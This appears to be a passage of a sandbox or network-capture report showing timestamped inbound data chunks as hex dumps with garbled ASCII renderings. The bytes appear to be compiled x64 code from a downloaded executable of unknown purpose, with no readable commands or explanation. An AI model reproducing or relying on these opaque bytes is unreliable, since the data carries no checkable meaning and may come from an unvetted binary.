                                                                  2022-07-15 01:58:15 UTC17INData Raw: 8b 46 08 48 8d 4c 38 01 48 89 4e 10 48 85 c9 0f 84 25 e5 02 00 48 83 c1 07 48 83 e1 f8 48 89 4e 10 b8 02 00 00 00 48 f7 e1 48 c7 c1 ff ff ff ff 48 0f 40 c1 48 8b c8 e8 c9 27 01 00 4c 8b 46 08 48 8b 16 4f 8d 44 00 02 48 8b c8 48 8b d8 e8 ea 1f 01 00 48 89 1e 48 8b 5c 24 40 e9 32 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 40 48 8b d9 48 3b ca 0f 84 ce e4 02 00 49 83 c9 ff 45 33 c0 e8 a2 fe ff ff 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b 41 08 48 8b da 48 8b f9 83 f8 04 0f 85 94 fa 02 00 83 7b 08 04 0f 85 ce fa 02 00 48 8b 53 10 48 8b 4f 10 e8 9d ff ff ff 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 89 5c 24 10 57 48 83 ec 20 83 79 08 00 48 8b fa 48 8b d9 75 16 48 8b 09 e8 22 33 00 00 ff 43 08 48
                                                                  Data Ascii: FHL8HNH%HHHNHHH@H'LFHODHHHH\$@2@SH@HH;IE3H@[H\$WH AHH{HSHOH\$0H _H\$WH yHHuH"3CH
                                                                  2022-07-15 01:58:15 UTC19INData Raw: 83 f9 02 0f 8c 58 0b 03 00 83 fe 0b 0f 84 d1 00 00 00 83 fe 0d 74 55 83 fe 0e 0f 84 06 01 00 00 83 fe 09 0f 85 72 01 00 00 83 f9 01 0f 84 2a 0a 03 00 80 7d 19 00 0f 85 29 0a 03 00 48 8b 55 10 83 f9 02 0f 85 29 0a 03 00 48 8b 4d 00 e8 f2 fa ff ff 48 8b cd e8 ca fe ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 50 5e c3 83 f9 01 0f 84 4c 0a 03 00 80 7d 19 00 0f 85 4b 0a 03 00 48 8b 55 10 83 f9 02 0f 84 eb 00 00 00 80 7d 19 00 0f 85 41 0a 03 00 48 8b 45 10 48 8b 48 18 e8 81 fb ff ff 48 8b cd e8 79 fe ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 50 5e c3 48 8b 52 08 48 8b 4a 08 e9 f2 fe ff ff 48 8b 5a 08 48 8b ca e8 5e 1d 01 00 48 89 5f 08 c6 47 11 00 e9 e9 fe ff ff 83 f9 01 0f 84 fc 09 03 00 80 7d 19 00 0f 84 fb 09 03 00 48 8b 45 10 48 8b 50 18 83
                                                                  Data Ascii: XtUr*})HU)HMH3H\$`Hl$pHP^L}KHU}AHEHHHy3H\$`Hl$pHP^HRHJHZH^H_G}HEHP
                                                                  2022-07-15 01:58:15 UTC20INData Raw: 8d 14 88 41 8b 8c 96 60 03 0b 00 83 f9 01 0f 85 a2 0d 03 00 41 83 f8 01 0f 85 59 0e 03 00 8b 5f 18 8b 46 08 83 f8 01 0f 85 24 0f 03 00 8b 06 3b d8 7c 78 8b 47 04 ff c0 41 89 45 00 0f 28 74 24 50 48 8b 4c 24 30 48 85 c9 0f 85 e0 0f 03 00 83 7c 24 28 08 0f 84 e9 0f 03 00 83 7c 24 28 0a 0f 84 02 10 03 00 83 7c 24 28 05 0f 84 15 10 03 00 83 7c 24 28 0b 0f 84 1a 10 03 00 83 7c 24 28 0c 0f 84 2d 10 03 00 4c 8b b4 24 a8 00 00 00 48 8b ac 24 a0 00 00 00 48 8b 9c 24 98 00 00 00 48 83 c4 60 41 5f 41 5d 41 5c 5f 5e c3 49 8b cc e8 c8 b7 00 00 eb 87 cc cc cc cc cc cc 48 83 ec 28 48 85 d2 0f 84 d0 00 00 00 48 89 5c 24 30 48 8b da 48 8b 52 30 48 89 7c 24 20 48 8b f9 48 85 d2 74 05 e8 d5 ff ff ff 48 8b 53 38 48 85 d2 0f 85 c9 00 00 00 80 7b 20 00 75 6d 48 8b 7b 28 48 85
                                                                  Data Ascii: A`AY_F$;|xGAE(t$PHL$0H|$(|$(|$(|$(|$(-L$H$H$H`A_A]A\_^IH(HH\$0HHR0H|$ HHtHS8H{ umH{(H
                                                                  2022-07-15 01:58:15 UTC21INData Raw: 03 00 f5 a2 03 00 0e a3 03 00 0e a3 03 00 0e a3 03 00 be a1 03 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 4c 24 08 55 56 57 41 54 41 55 41 56 41 57 48 81 ec e0 00 00 00 8b 05 7e 31 0c 00 33 ed 49 8b d9 4d 8b e0 4c 8b ea 48 8b f9 a8 01 0f 84 1a 08 00 00 45 32 f6 b9 10 00 00 00 c6 44 24 60 01 48 89 5c 24 30 89 6c 24 38 48 89 6c 24 40 44 88 74 24 61 c6 44 24 48 01 40 88 6c 24 49 e8 71 17 01 00 48 85 c0 0f 84 00 29 03 00 48 8b f0 c7 00 14 00 00 00 44 8b bc 24 40 01 00 00 48 89 6e 08 41 8b 0c 24 0f 29 b4 24 d0 00 00 00 49 8b 45 08 48 89 74 24 58 48 c7 44 24 50 01 00 00 00 48 8b 0c c8 4c 8d 1d 52 a8 ff ff 4c 8d 15 d3 30 0c 00 44 0f bf 49 0a bd 17 00 00 00 44 89 8c 24 28 01 00 00 41 8b 14 24 41 3b d7 0f 84 39 03 00 00 4d 8b 45 08 49 8b 04 d0 66
                                                                  Data Ascii: H\$HL$UVWATAUAVAWH~13IMLHE2D$`H\$0l$8Hl$@Dt$aD$H@l$IqH)HD$@HnA$)$IEHt$XHD$PHLRL0DID$(A$A;9MEIf
                                                                  2022-07-15 01:58:15 UTC23INData Raw: ca 32 03 00 44 0f b6 74 24 61 48 8b 74 24 58 4c 8d 1d b3 a3 ff ff e9 c0 fb ff ff 45 32 f6 89 2e 44 88 74 24 61 e9 f2 fe ff ff 48 8b 4c 24 40 49 8b d2 e8 82 1e 00 00 c6 44 24 49 00 4c 8d 15 0e 2c 0c 00 4c 8d 1d 7f a3 ff ff e9 04 fe ff ff 83 fd 16 0f 85 a5 01 00 00 bd 0b 00 00 00 8d 42 01 41 89 04 24 e9 6f fb ff ff 48 8b 5f 18 48 8b cf e8 94 1d 00 00 48 8b cf e8 ac 0d 01 00 48 8b fb 48 85 db 0f 84 93 fb ff ff eb de 8d 42 01 bd 0e 00 00 00 41 89 04 24 e9 3c fb ff ff 80 7c 24 49 00 0f 84 1e 01 00 00 48 8b 4c 24 40 49 8b d2 e8 05 1e 00 00 c6 44 24 49 00 e9 1f fc ff ff 80 7c 24 49 00 0f 85 a3 2f 03 00 48 8b 7c 24 40 e9 2c fc ff ff 66 0f 1f 44 00 00 45 84 f6 0f 84 8d 00 00 00 48 8b 46 08 83 38 12 74 6b 45 84 f6 74 04 48 8b 76 08 83 3e 14 0f 84 05 32 03 00 4c 8d
                                                                  Data Ascii: 2Dt$aHt$XLE2.Dt$aHL$@ID$IL,LBA$oH_HHHHBA$<|$IHL$@ID$I|$I/H|$@,fDEHF8tkEtHv>2L
                                                                  2022-07-15 01:58:15 UTC24INData Raw: 00 4d 85 c0 74 24 48 8b 13 49 8b cc 0f 1f 40 00 0f b7 01 66 39 02 0f 85 2e 10 00 00 48 83 c2 02 48 83 c1 02 49 83 e8 01 75 e6 83 06 ff 75 10 49 8b cc e8 99 08 01 00 48 8b ce e8 91 08 01 00 48 85 db 0f 84 02 1c 03 00 8b 43 28 8b 73 24 48 63 5b 20 8b 17 33 ed 89 44 24 70 49 8b 45 08 44 8d 42 01 48 89 ac 24 a8 00 00 00 48 8b 0c d0 41 8b 86 3c 02 00 00 48 89 ac 24 b0 00 00 00 44 0f bf 59 0a 44 89 07 89 84 24 e8 00 00 00 48 8d 05 55 c2 09 00 48 8d 0d 06 85 09 00 89 6c 24 30 c7 44 24 38 01 00 00 00 48 89 6c 24 40 48 89 84 24 c8 00 00 00 49 8b 45 08 48 89 8c 24 a0 00 00 00 4c 8b f5 4a 8b 0c c0 48 89 ac 24 b8 00 00 00 48 89 ac 24 d0 00 00 00 66 83 79 08 47 48 89 ac 24 d8 00 00 00 4c 8b fd 48 89 ac 24 e0 00 00 00 0f 85 e6 02 03 00 41 ff c0 89 74 24 50 89 5c 24 68
                                                                  Data Ascii: Mt$HI@f9.HHIuuIHHC(s$Hc[ 3D$pIEDBH$HA<H$DYD$HUHl$0D$8Hl$@H$IEH$LJH$H$fyGH$LH$At$P\$h
                                                                  2022-07-15 01:58:15 UTC25INData Raw: 0c 00 48 8d 3d 4e 21 0c 00 48 8d 35 47 21 0c 00 49 8b 1f 4d 8b 44 24 08 48 8b 43 08 4d 85 c0 0f 84 1d 06 03 00 48 85 c0 0f 84 1d 06 03 00 4c 3b c0 0f 82 32 06 03 00 4d 85 c0 0f 84 21 06 03 00 48 8b 0b 49 8b 14 24 0f b7 01 66 39 02 75 13 48 83 c2 02 48 83 c1 02 49 83 e8 01 75 ea e9 ff 05 03 00 0f 82 f1 05 03 00 b8 01 00 00 00 85 c0 0f 88 09 06 03 00 0f 8e ac 06 03 00 48 8b 4b 38 48 85 c9 0f 85 51 06 03 00 49 8b 07 48 8b 48 30 48 89 4e 38 49 8b 07 48 8b 48 38 48 89 4f 30 49 8b 0f 48 8b 05 e7 20 0c 00 48 89 41 30 49 8b 0f 48 8b 05 d1 20 0c 00 48 89 41 38 40 84 ed 0f 85 6c 06 03 00 b9 40 00 00 00 41 81 e5 00 ff 00 00 e8 1b 07 01 00 33 ed 48 85 c0 0f 84 8a 06 03 00 48 8b f8 48 89 68 08 b9 08 00 00 00 48 89 48 10 b8 02 00 00 00 48 c7 c6 ff ff ff ff 48 f7 e1 48
                                                                  Data Ascii: H=N!H5G!IMD$HCMHL;2M!HI$f9uHHIuHK8HQIHH0HN8IHH8HO0IH HA0IH HA8@l@A3HHHhHHHHH
                                                                  2022-07-15 01:58:15 UTC27INData Raw: 85 c9 0f 85 28 07 03 00 33 ff 8b 46 08 83 f8 08 0f 84 2d 07 03 00 83 f8 0a 0f 84 44 07 03 00 83 f8 05 0f 84 55 07 03 00 83 f8 0b 0f 84 5a 07 03 00 83 f8 0c 0f 84 6b 07 03 00 44 89 66 08 89 3e 8b 43 08 89 46 08 83 f8 04 0f 85 70 07 03 00 8d 48 1c e8 3f 02 01 00 48 85 c0 0f 84 f3 08 03 00 48 8b 53 10 48 8b 0a 48 89 08 48 8b 4a 08 48 89 48 08 48 8b 4a 10 48 89 48 10 48 8b 4a 18 48 89 48 18 ff 01 48 89 46 10 33 f6 49 8b 07 48 63 48 04 42 80 7c 39 19 00 4a 8d 5c 39 08 0f 85 d9 08 03 00 48 8b 4b 08 80 79 20 00 0f 85 d8 08 03 00 80 7b 11 00 0f 85 e7 08 03 00 48 8b 4b 08 80 79 40 00 0f 85 e6 08 03 00 49 8b 07 48 63 78 04 42 80 7c 3f 19 00 0f 85 10 09 03 00 42 80 7c 3f 18 00 0f 85 30 09 03 00 4a 8b 5c 3f 10 48 8b 6b 48 48 85 db 0f 84 b8 00 00 00 48 8b 4b 38 48 85
                                                                  Data Ascii: (3F-DUZkDf>CFpH?HHSHHHJHHHJHHHJHHHF3IHcHB|9J\9HKy {HKy@IHcxB|?B|?0J\?HkHHHK8H
                                                                  2022-07-15 01:58:15 UTC28INData Raw: c1 f8 00 00 48 8b 84 24 a8 00 00 00 48 ff c7 48 3b fd 0f 82 74 ff ff ff 48 8b 8c 24 a8 00 00 00 e8 a0 f8 00 00 33 c0 48 81 c4 48 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 33 f6 eb 84 48 8b 5b 30 48 85 db 0f 85 9d ef ff ff e9 e4 0b 03 00 4d 03 ff 49 83 ff 04 73 06 41 bf 04 00 00 00 48 c7 c1 ff ff ff ff b8 08 00 00 00 4c 89 bc 24 e0 00 00 00 49 f7 e7 48 0f 40 c1 48 8b c8 e8 ba fc 00 00 4c 8b 84 24 d8 00 00 00 48 8b 94 24 d0 00 00 00 49 c1 e0 03 48 8b c8 48 8b d8 e8 d3 f4 00 00 48 8b 8c 24 d0 00 00 00 e8 16 f8 00 00 48 89 9c 24 d0 00 00 00 48 8b 9c 24 d8 00 00 00 e9 39 f1 ff ff 4d 03 f6 49 83 fe 04 73 06 41 be 04 00 00 00 48 c7 c1 ff ff ff ff b8 08 00 00 00 4c 89 b4 24 b8 00 00 00 49 f7 e6 48 0f 40 c1 48 8b c8 e8 47 fc 00 00 48 8b bc 24 a8 00 00 00 4c
                                                                  Data Ascii: H$HH;tH$3HHA_A^A]A\_^][3H[0HMIsAHL$IH@HL$H$IHHH$H$H$9MIsAHL$IH@HGH$L
                                                                  2022-07-15 01:58:15 UTC29INData Raw: 00 e8 46 a0 00 00 85 c0 75 1c 48 8d 8c 24 a0 00 00 00 ff 15 a4 03 09 00 48 8d 8c 24 a0 00 00 00 ff 15 8e 03 09 00 48 8d 8c 24 a0 00 00 00 45 33 c9 45 33 c0 33 d2 c7 44 24 20 01 00 00 00 ff 15 80 03 09 00 85 c0 0f 84 59 fc ff ff e9 7b ff ff ff e8 06 cb 00 00 e9 c2 fb ff ff 83 bf c4 01 00 00 02 0f 85 46 39 03 00 c6 87 38 02 00 00 01 44 89 af c4 01 00 00 e9 4f fd ff ff 48 8b cf e8 69 ca 00 00 80 bf c8 01 00 00 01 0f 84 72 fe ff ff 48 8b cf e8 b4 a4 ff ff 33 c9 ff 15 bc 06 09 00 48 8b 0d 4d dd 0a 00 ff 15 8f 04 09 00 48 8d 8c 24 20 01 00 00 45 33 c9 45 33 c0 33 d2 ff 15 89 06 09 00 85 c0 0f 8e 37 fe ff ff e9 fd 3b 03 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 81 ec 48 01 00 00 80 3d 2e e7 0b 00 00 0f 85 7c 22 03 00 32 c0 48 81 c4 48 01 00 00 c3 cc cc 4c 8b dc
                                                                  Data Ascii: FuH$H$H$E3E33D$ Y{F98DOHirH3HMH$ E3E337;HH=.|"2HHL
                                                                  2022-07-15 01:58:15 UTC31INData Raw: 80 00 00 00 48 8b 9c 24 a0 00 00 00 48 89 7c 24 60 8b bc 24 98 00 00 00 4c 89 6c 24 50 45 33 ed 44 89 2b 39 bc 24 90 00 00 00 0f 83 a2 00 00 00 48 8d 54 24 30 49 8b cc 44 89 6c 24 30 c7 44 24 38 01 00 00 00 4c 89 6c 24 40 e8 14 cd ff ff 4d 8b 5c 24 10 49 8b 44 24 08 4c 8d 84 24 90 00 00 00 4e 8b 4c d8 f8 48 8b d6 48 8b cd 89 7c 24 20 e8 3e da ff ff 85 c0 0f 85 eb cf 02 00 8b 94 24 90 00 00 00 ff 03 3b d7 74 3e 48 8b 46 08 48 8b 0c d0 66 83 79 08 40 0f 85 b1 cf 02 00 8d 42 01 3b c7 0f 84 a6 cf 02 00 48 8d 4c 24 30 89 84 24 90 00 00 00 e8 3a fd ff ff 39 bc 24 90 00 00 00 0f 82 6a ff ff ff eb 0a 48 8d 4c 24 30 e8 21 fd ff ff 33 c0 48 8b 9c 24 80 00 00 00 48 8b 7c 24 60 4c 8b 6c 24 50 4c 8b 64 24 58 48 83 c4 68 5e 5d c3 cc 48 89 5c 24 20 55 41 54 41 55 41 56
                                                                  Data Ascii: H$H|$`$Ll$PE3D+9$HT$0IDl$0D$8Ll$@M\$ID$L$NLHH|$ >$;t>HFHfy@B;HL$0$:9$jHL$0!3H$H|$`Ll$PLd$XHh^]H\$ UATAUAV
                                                                  2022-07-15 01:58:15 UTC32INData Raw: 92 09 00 48 89 05 90 92 0a 00 49 8b 01 48 89 87 48 14 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 14 0b 00 89 5c 24 0c c7 05 81 92 0a 00 01 00 00 00 c7 05 7b 92 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 b4 91 09 00 48 89 05 6d 92 0a 00 48 8d 05 46 29 06 00 48 89 04 24 49 8b 01 48 89 87 68 14 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 70 14 0b 00 48 8d 05 5a 91 09 00 89 5c 24 08 48 89 05 57 92 0a 00 48 8d 05 60 29 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 89 1d 37 92 0a 00 89 1d 35 92 0a 00 48 89 87 88 14 0b 00 49 8b 41 08 48 89 87 90 14 0b 00 48 8d 05 08 91 09 00 c7 05 2e 92 0a 00 01 00 00 00 48 89 05 2f 92 0a 00 c7 05 21 92 0a 00 01 00 00 00 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 48 8d 05 e2 00 05 00 48 89 04 24 49 8b 01 48 89 87 a8 14 0b 00 49 8b 41 08 89 5c 24 08 48
                                                                  Data Ascii: HIHHIA\$HP\${L$HHmHF)H$IHhIAL$HpHZ\$HWH`)\$H$I75HIAHH.H/!\$\$L$HH$IHIA\$H
                                                                  2022-07-15 01:58:15 UTC33INData Raw: 02 00 00 00 4c 8d 0c 24 48 8d 05 42 8b 09 00 48 89 05 6b 8f 0a 00 48 8d 05 44 26 06 00 48 89 04 24 49 8b 01 48 89 87 88 16 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 16 0b 00 89 5c 24 0c c7 05 51 8f 0a 00 01 00 00 00 c7 05 4b 8f 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 ec 8a 09 00 48 89 05 3d 8f 0a 00 48 8d 05 26 36 06 00 48 89 04 24 49 8b 01 48 89 87 a8 16 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 16 0b 00 89 5c 24 0c c7 05 23 8f 0a 00 01 00 00 00 c7 05 1d 8f 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 8e 8a 09 00 48 89 05 0f 8f 0a 00 48 8d 05 28 35 06 00 48 89 04 24 49 8b 01 48 89 87 c8 16 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 d0 16 0b 00 48 8d 05 4c 8a 09 00 89 5c 24 08 48 89 05 f9 8e 0a 00 48 8d 05 b2 74 07 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 d5 8e 0a
                                                                  Data Ascii: L$HBHkHD&H$IHIA\$H\$QKL$HH=H&6H$IHIA\$H\$#L$HHH(5H$IHIAL$HHL\$HHt\$H$I
                                                                  2022-07-15 01:58:15 UTC35INData Raw: 41 08 89 5c 24 08 48 89 87 90 18 0b 00 89 5c 24 0c c7 05 7d 8c 0a 00 03 00 00 00 c7 05 77 8c 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 48 84 09 00 48 89 05 69 8c 0a 00 48 8d 05 92 54 08 00 48 89 04 24 49 8b 01 48 89 87 a8 18 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 18 0b 00 89 5c 24 0c c7 05 4f 8c 0a 00 03 00 00 00 c7 05 49 8c 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 da 83 09 00 48 89 05 3b 8c 0a 00 48 8d 05 24 4b 08 00 48 89 04 24 49 8b 01 48 89 87 c8 18 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 18 0b 00 89 5c 24 0c c7 05 21 8c 0a 00 04 00 00 00 c7 05 1b 8c 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 74 83 09 00 48 89 05 0d 8c 0a 00 48 8d 05 36 55 08 00 48 89 04 24 49 8b 01 48 89 87 e8 18 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 18 0b 00 89 5c 24 0c c7 05 f3 8b
                                                                  Data Ascii: A\$H\$}wL$HHHiHTH$IHIA\$H\$OIL$HH;H$KH$IHIA\$H\$!L$HtHH6UH$IHIA\$H\$
                                                                  2022-07-15 01:58:15 UTC36INData Raw: 89 04 24 49 8b 01 c7 05 4f 89 0a 00 01 00 00 00 c7 05 49 89 0a 00 01 00 00 00 48 89 87 c8 1a 0b 00 49 8b 41 08 48 89 87 d0 1a 0b 00 c7 05 49 89 0a 00 03 00 00 00 c7 05 43 89 0a 00 03 00 00 00 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 48 8d 05 14 7d 09 00 48 89 05 2d 89 0a 00 48 8d 05 b6 e4 05 00 48 89 04 24 49 8b 01 48 89 87 e8 1a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 1a 0b 00 89 5c 24 0c c7 05 13 89 0a 00 01 00 00 00 c7 05 0d 89 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 b6 7c 09 00 48 89 05 ff 88 0a 00 48 8d 05 e8 e4 05 00 48 89 04 24 49 8b 01 48 89 87 08 1b 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 1b 0b 00 89 5c 24 0c c7 05 e5 88 0a 00 01 00 00 00 c7 05 df 88 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 48 7c 09 00 48 89 05 d1 88 0a 00 48 8d 05 9a e4 07 00 48 89
                                                                  Data Ascii: $IOIHIAHIC\$\$L$H}H-HH$IHIA\$H\$L$H|HHH$IHIA\$H\$L$HH|HHH
                                                                  2022-07-15 01:58:15 UTC37INData Raw: 87 f0 1c 0b 00 89 5c 24 0c 4c 8d 0c 24 c7 05 2f 86 0a 00 01 00 00 00 c7 05 29 86 0a 00 01 00 00 00 48 8d 05 ce 75 09 00 48 89 05 1f 86 0a 00 48 8d 05 48 58 06 00 48 89 04 24 49 8b 01 48 89 87 08 1d 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 10 1d 0b 00 48 8d 05 84 75 09 00 89 5c 24 08 48 89 05 09 86 0a 00 48 8d 05 a2 55 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 e5 85 0a 00 01 00 00 00 c7 05 df 85 0a 00 01 00 00 00 48 89 87 28 1d 0b 00 49 8b 41 08 89 5c 24 08 89 5c 24 0c 48 89 87 30 1d 0b 00 c7 05 d7 85 0a 00 01 00 00 00 c7 05 d1 85 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 fa 74 09 00 48 89 05 c3 85 0a 00 48 8d 05 1c 8e 03 00 48 89 04 24 49 8b 01 48 89 87 48 1d 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 1d 0b 00 89 5c 24 0c 89 1d ad 85 0a 00 c7 05 a7 85 0a 00
                                                                  Data Ascii: \$L$/)HuHHHXH$IHIAL$HHu\$HHU\$H$IH(IA\$\$H0L$HtHHH$IHHIA\$HP\$
                                                                  2022-07-15 01:58:15 UTC39INData Raw: 89 04 24 49 8b 01 48 89 87 28 1f 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 1f 0b 00 89 5c 24 0c c7 05 03 83 0a 00 01 00 00 00 c7 05 fd 82 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 8e 6e 09 00 48 89 05 ef 82 0a 00 48 8d 05 a8 f0 06 00 48 89 04 24 49 8b 01 48 89 87 48 1f 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 1f 0b 00 48 8d 05 3c 6e 09 00 4c 8d 0c 24 48 89 05 d9 82 0a 00 48 8d 05 f2 47 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 b5 82 0a 00 01 00 00 00 c7 05 af 82 0a 00 01 00 00 00 48 89 87 68 1f 0b 00 49 8b 41 08 48 89 87 70 1f 0b 00 48 8d 05 d2 6d 09 00 c7 05 a8 82 0a 00 01 00 00 00 48 89 05 a9 82 0a 00 48 8d 05 72 5d 06 00 c7 05 94 82 0a 00 01 00 00 00 48 89 04 24 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 49 8b 01 48 89 87 88 1f 0b 00 49 8b 41 08 89 5c 24 08
                                                                  Data Ascii: $IH(IA\$H0\$L$HnHHH$IHHIA\$HPH<nL$HHG\$H$IHhIAHpHmHHr]H$\$\$L$IHIA\$
                                                                  2022-07-15 01:58:15 UTC40INData Raw: 05 ef 7f 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 70 67 09 00 48 89 05 e1 7f 0a 00 48 8d 05 5a 44 06 00 48 89 04 24 49 8b 01 48 89 87 68 21 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 21 0b 00 89 5c 24 0c 89 1d cb 7f 0a 00 c7 05 c5 7f 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 06 67 09 00 48 89 05 b7 7f 0a 00 48 8d 05 70 f5 06 00 48 89 04 24 49 8b 01 48 89 87 88 21 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 21 0b 00 89 5c 24 0c c7 05 9d 7f 0a 00 03 00 00 00 c7 05 97 7f 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 90 66 09 00 48 89 05 89 7f 0a 00 48 8d 05 82 51 06 00 48 89 04 24 49 8b 01 48 89 87 a8 21 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 b0 21 0b 00 48 8d 05 3e 66 09 00 89 5c 24 08 48 89 05 73 7f 0a 00 48 8d 05 4c 3f 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 4f 7f
                                                                  Data Ascii: L$HpgHHZDH$IHh!IA\$Hp!\$L$HgHHpH$IH!IA\$H!\$L$HfHHQH$IH!IAL$H!H>f\$HsHL?\$H$IO
                                                                  2022-07-15 01:58:15 UTC41INData Raw: 08 89 5c 24 08 48 89 87 90 23 0b 00 89 5c 24 0c 89 1d c5 7c 0a 00 89 1d c3 7c 0a 00 4c 8d 0c 24 48 8d 05 9c 5f 09 00 48 89 05 b5 7c 0a 00 48 8d 05 be 6c 08 00 48 89 04 24 49 8b 01 48 89 87 a8 23 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 23 0b 00 89 5c 24 0c c7 05 9b 7c 0a 00 03 00 00 00 c7 05 95 7c 0a 00 07 00 00 00 4c 8d 0c 24 48 8d 05 1e 5f 09 00 48 89 05 87 7c 0a 00 48 8d 05 60 6c 08 00 48 89 04 24 49 8b 01 48 89 87 c8 23 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 23 0b 00 89 5c 24 0c c7 05 6d 7c 0a 00 02 00 00 00 c7 05 67 7c 0a 00 05 00 00 00 4c 8d 0c 24 48 8d 05 a8 5e 09 00 48 89 05 59 7c 0a 00 48 8d 05 02 6c 08 00 48 89 04 24 49 8b 01 48 89 87 e8 23 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 23 0b 00 89 5c 24 0c 4c 8d 0c 24 c7 05 3b 7c 0a 00 03 00 00
                                                                  Data Ascii: \$H#\$||L$H_H|HlH$IH#IA\$H#\$||L$H_H|H`lH$IH#IA\$H#\$m|g|L$H^HY|HlH$IH#IA\$H#\$L$;|
                                                                  2022-07-15 01:58:15 UTC43INData Raw: 04 24 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 49 8b 01 48 89 87 c8 25 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 25 0b 00 89 5c 24 0c c7 05 8d 79 0a 00 02 00 00 00 c7 05 87 79 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 10 57 09 00 48 89 05 79 79 0a 00 48 8d 05 52 66 08 00 48 89 04 24 49 8b 01 48 89 87 e8 25 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 25 0b 00 89 5c 24 0c c7 05 5f 79 0a 00 01 00 00 00 c7 05 59 79 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 92 56 09 00 48 89 05 4b 79 0a 00 48 8d 05 f4 65 08 00 48 89 04 24 49 8b 01 48 89 87 08 26 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 26 0b 00 89 5c 24 0c c7 05 31 79 0a 00 02 00 00 00 c7 05 2b 79 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 0c 56 09 00 48 89 05 1d 79 0a 00 48 8d 05 96 65 08 00 48 89 04 24 49 8b 01 48 89 87 28
                                                                  Data Ascii: $\$\$L$IH%IA\$H%\$yyL$HWHyyHRfH$IH%IA\$H%\$_yYyL$HVHKyHeH$IH&IA\$H&\$1y+yL$HVHyHeH$IH(
                                                                  2022-07-15 01:58:15 UTC44INData Raw: 5c 24 08 48 89 05 87 76 0a 00 48 8d 05 60 22 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 63 76 0a 00 01 00 00 00 c7 05 5d 76 0a 00 02 00 00 00 48 89 87 08 28 0b 00 49 8b 41 08 48 89 87 10 28 0b 00 c7 05 5d 76 0a 00 01 00 00 00 89 5c 24 08 89 5c 24 0c c7 05 4f 76 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 e0 4e 09 00 48 89 05 41 76 0a 00 48 8d 05 ca 1b 06 00 48 89 04 24 49 8b 01 48 89 87 28 28 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 28 0b 00 89 5c 24 0c c7 05 27 76 0a 00 02 00 00 00 c7 05 21 76 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 6a 4e 09 00 48 89 05 13 76 0a 00 48 8d 05 9c 17 06 00 48 89 04 24 49 8b 01 48 89 87 48 28 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 28 0b 00 89 5c 24 0c c7 05 f9 75 0a 00 02 00 00 00 c7 05 f3 75 0a 00 08 00 00 00 4c 8d 0c 24 48
                                                                  Data Ascii: \$HvH`"\$H$Icv]vH(IAH(]v\$\$OvL$HNHAvHH$IH((IA\$H0(\$'v!vL$HjNHvHH$IHH(IA\$HP(\$uuL$H
